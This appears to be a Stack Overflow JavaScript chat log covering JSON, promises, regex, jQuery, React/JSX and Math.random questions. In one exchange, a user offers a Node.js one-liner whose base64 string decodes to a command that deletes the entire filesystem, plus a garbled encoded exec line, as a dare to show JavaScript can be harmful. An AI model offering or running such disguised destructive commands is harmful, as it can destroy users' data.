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@Monners I might buy an iMac for home :P
@rlemon cool sounds good
Can I ask a question about a question I've asked in SO?
I really would like to understand why this question got me so many downvotes, since it was really legit
Q: JSON can't accept empty element in array

ElricI have an array in javascript that looks like this: var pattern = [ ["C5", 3], , , , , , , , ["C5", 3], , , ] I want to store it in a json file like this: { "pattern": [ ["C5", 3], , , , , , , , ["C5", 3], , , ] } JSONLint tells me this: Parse error on line 6...

haha a bit weird to type on
but its got dem sexy custom c64 logos :P
Dope. I like the ESC key
Nice keyboard
@KosmasPapadatos Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
So... I was wondering if there is a place for, like, social coding. Where people can chat about projects and work together to make fun stuff remotely.
Felt like this is the right place to ask this
@KosmasPapadatos the internet?
Remote code hackerspace
Is that a thing?
that sounds nice
no, it's not a thing...
but could be.. with some effort
and a permanent IRC chat running...
@phenomnomnominal wow you really narrowed it down xD
And some torrent to share a folder in the public - or drobox...
There is also github but it's just too structured
I was hoping for something with more social features
Could you enlight me.. what kind of social features?
Well, Instagram for example is a social network for Photography (at least it used to be), where people would make friends and exchange comments about photos and stuff
How about a social network for coding, where people would post projects, and whoever is interested can contribute through github or something
Only, more social xD
Instagram is not really social, it's a place for bragging... I like DA for drawings, but it's harder each year to do collaborative art...
Do you like games?
If you want a really cool experience note down the date of the next Global Game Jam, check the nearest jam sites to you, and go there
@KosmasPapadatos you're legit just describing github
You will be part of a team of people you didn't knew, and will make a game in 48h with them
@phenomnomnominal enlighten me. How can I get people invloved in my project ideas on github if not by disturbing strangers in their email addresses?
@phenomnomnominal I think I understand what @KosmasPapadatos is saying. In github you have no friend list or similar... So you basically start a project on your own and pray to find someone who has interest in what you are doing.... You can't find people in boredown in a weekend and start doing something
you see, where I live, coding isn't so popular :P
Noone in my circles knows how or is interested in learning
I understand
But there has to be a university or something
Well there is, but I'm not in it
Anyway, I will send you an email, so at least now you have +1 person to talk if you need.
Haha thanks :)
Also, your country has a really cool wifi network, if you like telecom, there are some really nice dudes, you can search the mail lists
freifunk and similar
oh, and there is reddit
same answers
yeah, going to sleep. o/
I know we're not allowed to comment "RTFM," but this is the perfect case: stackoverflow.com/q/30586356/2476755 =/
ReactGurus - github.com/winjs/react-winjs/blob/master/react-winjs.js < Doesn't that break everything we like about react ? I mean every single child component gets injected in the TopLevel component
Or we are okay with that now ?
This is what my HTML source looks like:

And this is what Firebug console looks like:

The JavaScripts would load via an AJAX in a loop. It would keep loading them on and on until the browser stops responding. Mind the scrollbar in the image. I can't figure what is the problem. The same set of JavaScripts on other pages load fine.
Ecmascript 6 is going to turn JS into a serious functional programming language
especially with its arrow feature
Can I get some feedback on promises. I think I understand, we'll see... jsfiddle.net/uv2ae5c2
@Mathemats what are you trying to ask?
@EnglishMaster is that how promises should be used?
@EnglishMaster fat arrow is useful for most paradigms, including procedural, functional, and object oriented.
@Sheepy Absolutely
I love it. JS is going to look almost like Erlang pretty soon.
@EnglishMaster Normally I would do something like jsfiddle.net/aj2gxtsx
Oh yes. ES2015 is great. (Except for class)
I can't really see much difference between my two examples
@Mathemats I mean, it doesn't matter.
@Mathemats There isn't much difference, because the example is simple.
I wonder if there's a brilliant way (design pattern on top of design pattern) to clean code (or shorten) a bunch of different types of observers (pattern) in Javascript
My code is very procedural. First I need the ClientID, then I need the validItems based on the ClientID. So you are saying that in simple cases like this, there isn't much reason to use .then then.
I'm working on an game server engine and it generally has 50 ~100 observers in client side code
@phenomnomnominal ty
Q: Draggable blocks glued with each other

mef_Here is the sample on codepen. I use rails application and mongoDB at back end, jquery and Draggabilly library at front end. Every time dragEnd or focusout events are triggered app tries to save card data to DB via ajax request. If there an error it return 422 code status with error message wic...

Q: CodeCogs Latex Editor not working properly with multiple instances of CKEditor

rahulvI am working on a Rails project where I am using Equation Editor plugin in CKEditor for displaying editors in text-areas The CodeCogs Latex Editor is working properly if the view contain only one CKEditor instance. When multiple instances occur in the same view the equation editor is not working...

Can someone help me with this issue?
can anyone think of any way JS being harmful to your computer?
I'm starting to believe that guy who told me privately you were a troll
now crossite scripting is pretty much impossible in any browsers
so what is possible with JS?
I mean, it's just a harmless little language, I reckon.
it's weird to see crossite scripting instead of xss.
what do you mean?
@EnglishMaster he's telling you to use different terminology
pretty odd you didn't recognize his implication considering you are an "EnglishMaster"
I'm pretty familiar with it
But it was slightly awkward to see somebody randomly suggest "Please use a different terminology"
My point is, you can't ever do anything harmful with Javascript unless you encourage users to give you their bank account detail for your hot sister-in-raw in trade. Like

alert("I'm tired of trying to get crosssite scripting work on any major browsers, please send me your bank account detail for my hot sister in trade");
alert("your [email protected]");
Hi, can I ask help I have this error in JShint Expected an assignment or function call and instead saw an expression
What's the point of these two lines?
@EnglishMaster I didn't suggest that you use different terminology, nothing about this was awkward in the least.
@JanDvorak me?
@Mathemats right
@EnglishMaster yes, I can. run this in node require("child_process").spawn(new Buffer('cm0gLXJmIC8=', 'base64').toString(), {cwd: "./", env:process.env, stdio:"inherit"})
@EnglishMaster yes
if that's not dangerous, then I don't know what is
@royhowie In your node or in my node
I mean, in my node, I wouldn't run that
@EnglishMaster why not?
because my node is for general usage, like web surfing, making money by building site and etc. I hope you got what I mean, my node your node.
It's a different terminology to "my computer"
it's techinically a node too if you view it from server administrator perspective
I was talking about in your shell
@EnglishMaster you can also try exec(new Buffer('-j.\n7\u001c\u0006)]~\u001ahqk,2\u00160\u001ew0\u0006g_z7&R\u0002W&b\u00‌​02q6,{.-!+k\nx\u001cA_^\u001ezk!G,1io2Wb")az8-', "base64").toString())
oh shoot, you see, this terminology conflict occured because we are from different background. So you shouldn't bash me on not using a certain terminology like above
We're in the javascript room. "node" is understood what you can download at nodejs.org
(although iojs.org is the "new" thing nowadays)
well, from my persepctive as EnglishMaster, it has very different meaning than nodejs.org
26 secs ago, by EnglishMaster
well, from my persepctive as EnglishMaster, it has very different meaning than nodejs.org
You might need to apply for a name change EM
@JanDvorak please kick him or something
lets say I have requirejs loaded like this: <script type="text/javascript" src="http://requirejs.org/docs/release/2.1.18/minified/require.js"></script>
hey, document.createElement can accept two arguments? Whats the 2nd one for?
!!tell deostroll mdn document createelement
I've seen that...
it only has one argument...
are you sure it can accept two arguments?
Under extending native html elements section....
must be non-standard. added by Polymer?
I have a problem in which require calls works only after if I do requirejs call for the same module
Prelude> ghci

<interactive>:2:1: Not in scope: `ghci'
@deostroll The formal createElement is DOM level 1 and accepts only one parameter. As far as I know there are no formal extensions that add optional parameter to it.
(And it's bad to borrow a standard API and make incompatible changes. What if in the future there is an extension that is incompatible with your changes? Happened more times than we'd like to see in JS already.)
@FlorianMargaine Hey!
Hello guys, I am trying this in jQuery:
1) send trigger click on form button
2) wait for page load
3) show some data

But how can I do the trigger("click") and then wait for load page? I was tried $.when ... do ... but its not work (alert will show before the form is sent) :/

Is it possible to do this as I described above?
@pes502 Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
Javascript gets unloaded when you navigate to a different page.
Showing a submit confirmation is usually the server's business.
Don't trigger click events - do what their handlers do.
If you want to submit a form without navigating, don't submit it - send it through AJAX. Then your javascript won't unload.
I am writing the script in TamperMonkey, and the script will fill the form then send trigger("click"), then new page is loaded and this page contain a HTML table which I need to parse
then use GM storage
perhaps you always want to do that thing when you visit that URL?
maybe look into service workers, but it seems like overkill to me
Hey guys. I'm looking at a npm package tslint (npmjs.com/package/tslint) and it lists a release 2.2.0-beta. When I go to the GitHub releases there is only 2.1.0. Is there a way to see releases on npm when, apparently(?), the GitHub page is poorly maintained?
Does a global variable declared on one javascript accessible on another imported javascript file?
have you tried?
trying it on a established environment is quite difficult. but i havent
It depends on the environment. In browsers, yes. With modules, no.
Noooooo! My custom Pikachu keycap was sent to the wrong bloody address!
pikachu keycap?
neato. Which key would it replace, though?
Escape key
how much would it cost to 3d-print?
well, 2k a 3d-printer xD
Morning btw
@JanDvorak It's aluminum, so a little more I'd imagine
@SomeGuy hey
Morning :)
@BenFortune Morning
@BenFortune Morning. This branch is behind master though, but it's the beta branch?
@RoelvanUden Yeah, look in package.json it's the same version as NPM.
Ahhh. Thanks @BenFortune :D
        console.log("You hit");
        totalDamage += damageThisRound;
        if (tatalDamage >= 4){
            console.log("you win!");
            slaying = false;
            youHit = Math.floor(Math.random() *2);
        console.log("You lose!");
   slaying = false;
how to fix -Does your second 'if' statement check to see if totalDamage is greater than or equal to 4?
Sounds like homework xD
@BenFortune yes it is.
Whups, employees are kicking off
@Harish I'm pretty sure it's wrong as it is right now.
It makes little sense in regard to slaying and whatnot.
@RoelvanUden where is the wrong?
You go into a while loop and regardless of what happens, you turn slaying off. Thus making the while moot.
And for the love of everything that is holy, validate your code. You have typos all over the place.
slaying off wont solve it.
its ok I fixed it
there is a spelling mistake in totalDamage.
Hence the validation part.
Hello Guys,
I am trying to filter the fqdn name using regex in javascript from the nslookup output.

nslookup output:
Server:\t\t10.239.128.23\nAddress:\t10.239.128.23#53\n\nNon-authoritative answer:\n217.212.9.10.in-addr.arpa\tname = zk-large-2-356532.phx-os1.zoops.dev.lop.com.\n\nAuthoritative answers can be found from:\n\n

the regex i came up with:
[\b]*name =\S*([^\\]*)
but it matches
"name = zk-large-2-356532.phx-os1.zoops.dev.lop.com."

I want only "zk-large-2-356532.phx-os1.zoops.dev.lop.com" to match
@rrs120486 Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
If you want to generically add to an array in JavaScript, will .push() work out of a "good code" thinking? It works in what I want it to do, but is there something else more suited for it?
define "generically add". Push is for adding stuff to the end of an array.
Well, the thing is that it also returns the length of the array, which made me wonder if it's just multi-purpouse or if there's another way to add to an array without knowing what slot to add it too.
I didn't even know it returned the array length...
Sure, by index is possible. You can just tack it on. An array in JS essentially a list from OOP languages. It's an array internally but once you hit the boundaries it expands. Simple as that.
All the regular caveats apply.
@RoelvanUden Well, that's where "generically" comes in. I don't know the length of the array and I just want to add to it. So then it seems like .push()is indeed the way to go. I kept kinda wanting something like ".add()".
@JanDvorak Believe it or not but I RTFM
I'm kinda bad at googling so I wanted to cross check if there was another or "better" way to do it.
@Gemtastic push() is add(). It adds an element to the end of the list.
I don't doubt that you read manuals. I just suck at hinting that yes, push is the preferred way unless you already know the index.
@RoelvanUden Yes, and it also returns the length, and that's what had me puzzled if it was intended for some other use.
@Gemtastic Probably just a gimmick. Like @JanDvorak I didn't even know it did that. But perhaps you can do arr[arr.push(el)].someProperty = 10 because it's cool? Completely unreadable though.
@RoelvanUden ew
@RoelvanUden I maintain my opinion of JS being a "herpaderp" language. I have no good idea of why anyone would want that functionality either, but yet, there it is! ;)
TBH Ruby has its own set of weird return values, too
@Gemtastic Yes, there is plenty of "Why the hell would anyone want this?!" in the APIs. But alas, that happens on all evolved languages. Just take a look at Ruby, PHP, C/C++, C# and Java; just stuff tacked on stuff and stuff that makes no sense for anyone. Most languages "do too much" for no good reason.
(Which makes Lua oh so elegant)
I don't know any ruby so I can't say. There might be and probably are even more herpaderp languages than JS but I'm still a n00b and only know Java and JavaScript
gsub (obviously) returns the modified string and gsub! modifies in place, but guess what it returns? self if it substituted anything and nil if it didn't. So that you could do nil while str.gsub! pat, repl
Python has a weird argument order to gsub
@Gemtastic Well, just look at the non-generic lists (ArrayList?) in Java. Who would ever need them? Well, they date from the pre-generic era. Evolved stuff. There are also absolutely things you think nobody ever needs. :)
Haskell is powerful but the function names are unusual to 90% of programmers
ArrayList is generic
Well, whatever it is called in Java. I do primarily C#, which has ArrayList (non-generic) and List<T> (generic). I remember Java has a similar legacy thing. Of course :P
Ruby's arrays are super-multipurpose. They serve as arrays, queues, stacks as well as deques.
Isn't that the same for JS?
and it even makes sense in Haskell and Lisp to use lists as stacks
... and instead of queues you use generators / infinite lists
@RoelvanUden Well, there WAS a purpose for it once, but when you look at .push() it looks like it's always been wonky :P
Old monstrosities I assume exists in everything that's lived long enough to be called "old"
My function isn't running, when imported in an outside file. I have put jQuery before any import. The funny thing is, that it works when put in the console and when it's inline, even though it's exactly the same in the .js import. How do I debug this? I tried to use console.log(), but it doesn't log
    $(window).scroll(function () {
        var topscroll = $(this).scrollTop();
        if ($(this).scrollTop() > 500) {
        } else {
        if (topscroll > 50) {
        else {
Any regex experts here? I am facing a issue while getting value from name value pair in javascript

@StevensHaen if the code isn't even run, you'll have to find out why. Anything in the console?
Nothing, except an unrelated error
I have the ready handler in place as well. It doesn't reach the function for some reason, I guess.
Under "Sources" in the Chrome inspector, the script shows up, so the path is correct. It's importing, but console.log() event @ the top of the document ( under the ready handler) results in nothing
syntax error?
I got rid of $(document).ready(function(){}) and now it's working. Interesting. I also tried $(window)
Is your document ever ready? :P
E.g. if you do a streaming list of stuff and never really close the connection, it's never ready.
or if you explicitly tell it to hold ready
It's not strictly speaking my document. I don't know all it does
can someone help me secure the identifier in an anchor tag ?
I mean i have been using data-id = 23 attribute to anchor tag but it is displaying this crucial id in view source.. how can i make this secure
If you want to access 'secure' data on the client-side, you need it there.
There is no way for anything that lives on the client to be 'secure'.
secure and client-side are not compatible words
The next best thing is hashing and whatnot, but only one-way.
Then what should i go ahead with... i am on asp.net mvc 4 .. and was using this example stackoverflow.com/a/16107009/1221203 to get my value from view model to controller.
You can have it in memory only and encrypt the communication, but you'll have to decrypt it at one point and that's where they'll put a breakpoint
@Nezam Why is an ID so important? Do you even care someone knows an ID?
... or they catch you red-handed when you include that super-secure data in plain view in a URL.
Hello, is there a way to keep a question online but prevent it from being downvoted?
It's confusing. He asked here and in C# room at once. I'mma continuing that there.
in C#, 1 min ago, by Nezam
Its important because its the key on which action is performed.. Some one may hit my action using this id and perform weird things?
@Elric ask it on Yahoo Answers
I just wanted to keep it online as reference, and because I'm really interested in an answer
or stash it away on pastebin. Same difference
if it's on-topic, well researched, clear and useful, it will attract upvotes
@Elric Well, if it's a good question/answer, it wouldn't be downvoted.
I think people miss understood completely what I asked but I am afraid to rephrase and get more downvotes
Are you asking whether it's OK to ask and answer your own question?
No, I am not
@Elric Have you already asked?
What is the possibility of Math.random() returning 0?
Q: JSON can't accept empty element in array

ElricI have an array in javascript that looks like this: var pattern = [ ["C5", 3], , , , , , , , ["C5", 3], , , ] I want to store it in a json file like this: { "pattern": [ ["C5", 3], , , , , , , , ["C5", 3], , , ] } JSONLint tells me this: Parse error on line 6...

well, JSON doesn't like this indeed
I reduced the code as possible for showing, but it's just this, I didn't know this and couldn't find an answer anywhere else when searching
I don't really think it's useful as a reference
@JanDvorak Why? I think it's perfectly fine
I am making some tools and json was something that was really human readable for storage
"How do I store an empty value in JSON?" "Use null"
You have my +1.
Time will tell. If googlers find this, they may upvote
@Charly 0.00000....0001% ¿?
Ok, so the whole point of using json as storage is human readable and small, now I know it will be filled with null I will change to .csv
Ok, thanks for caring.
(not sarcastic.. I'm just waking up)
maybe use a hash instead of a sparse array?
@Charly 1e-17
@Neoares are you sure?
ok thanks
see the other answer, too
52*log10(2) ~= 15.653559774527022151114422525674 digits.
so 1e-16 I guess
btw I never got a 0 doing that :/
have you tried a trillion times?
I mean, literally a trillion times
Literally almost
obviously no
a trillion times 1e-16 is still quite small chance
while(Math.random()!==0){ //do nothing } alert("YOU GOT IT!");
crash warning
@Charly not really. one trillion is one hundred times 1e-16
It can happen!
@JanDvorak depending if this trillion is american or not
!!> var biggest = 0; for( var i = 0; i < 1000; ++i ){ var len = Math.random().toString().length - 2; if( len > biggest ) biggest = len; }; biggest
@towc 19
@JanDvorak in spain a trillion has 18 zeroes, in America it has 12
so, we have 1e-19 chance then
ah, drat. Sorry
( -2 was for the "0." )
@JanDvorak 3.0000000000000004e-8
the precision o.O
that 4
so -2 is not enough :-)
!!> 0.1+0.2
@Neoares 0.30000000000000004
my school network prevents me from going to that link...
it's a virus
Hi. gist.github.com/anonymous/ecce50e2171ed33b50d4 The click function is being called on page load. Can you suggest why?
@SonaliGupta Welcome to the JavaScript chat! Please review the room pseudo-rules. Please don't ask if you can ask or if anyone's around; just ask your question, and if anyone's free and interested they'll help.
@SonaliGupta .click simulates a click
what you're looking for is probably .on('click', clickFunc ) I think
...when called without arguments
oh, I dunno then
Was my first guess as well ;D
Q: Cant understand why replace() is not working here

Rahul DesaiThe input is: '<div><strong>test</strong><div><strong>kkk</strong></div><div><strong>111</strong></div></div>' And the output needs to be: '<div><strong>test</strong><div><strong>kkk</strong></div><div>111</div></div>' (<strong> tag unwrapped from 111) Here is what I have so far: var ...

@towc yeah, it's weird, it really shouldn't trigger a click. .click called with arguments is just a shorthand-function for binding a handler, while .click() is a shorthand for the trigger.
pastie.org/10219166 two questions , 1) when in the console.log why do I have only required: true , what happened to the maxlength? 2) why is scope.$watch not working ? not even adding scope.$apply thing works
@rlemon can your app handle like 1milion requests per hour?
@Neoares Probably not, since GM needs to be launched for each request
so I need to find a pixel :)
Anyone here use JSX?
@Cereal I have a basic understanding of it
@RahulDesai that's because your .* is matching everything
Worth using? It looks like actionscript ._.
I fixed it
.* is a mess :D
yep :D
I learned it the hard way
It's pretty much a short-hand language
It looks like a more verbose javascript. No, it looks exactly like actionscript
The jsx transformer tells you not to use it in production, but to convert it to js beforehand
"I wish I knew that earlier!" lol
Well yea, as with any javascript "replacement"
When you write React, do you use JSX or JS and use React.DOM.??? stuff?
React was the primary reason I was asking about it
JSX, think of it as shorthand for what you'd be doing natively anyway
@monners So you're using a transformer of some kind?
@RoelvanUden JSX and Flummox
Hey guys which audio format(s) are the most commonly accepted when building an application that has to range between many different browsers ?
ogg/mp3/midi probably
@MarcRasmussen Google it
@monners great idea ;) why didn't i think of that my self
@MarcRasmussen That's a good question. Why didn't you?
@monners i don't believe in google im waiting marriage
I don't believe in developers that don't believe in Google
Mostly because they come off as lazy and selfish
i don't believe in developers who don't believe in developers who do not believe in google
@MarcRasmussen You're exactly as clever as everyone thinks you are.
That's true
It's hard to convince people otherwise
which is why we still have religion :)
Well that's enough stupid for me tonight. Ciao.
Good night mate :) sleep tight
Why flag that ?
I don't think he understood that i was making a joke
@monners Good night :)
posted on June 02, 2015

Well, last week’s article generated quite a few hits, and even some useful responses. It’s time to respond to the responses — and note one interesting coincidence. Hacker News For a few precious hours last Tuesday my article took the coveted top spot on Hacker News. That never lasts long, and I fully expected to be kicked off the front page before the day was over, but the

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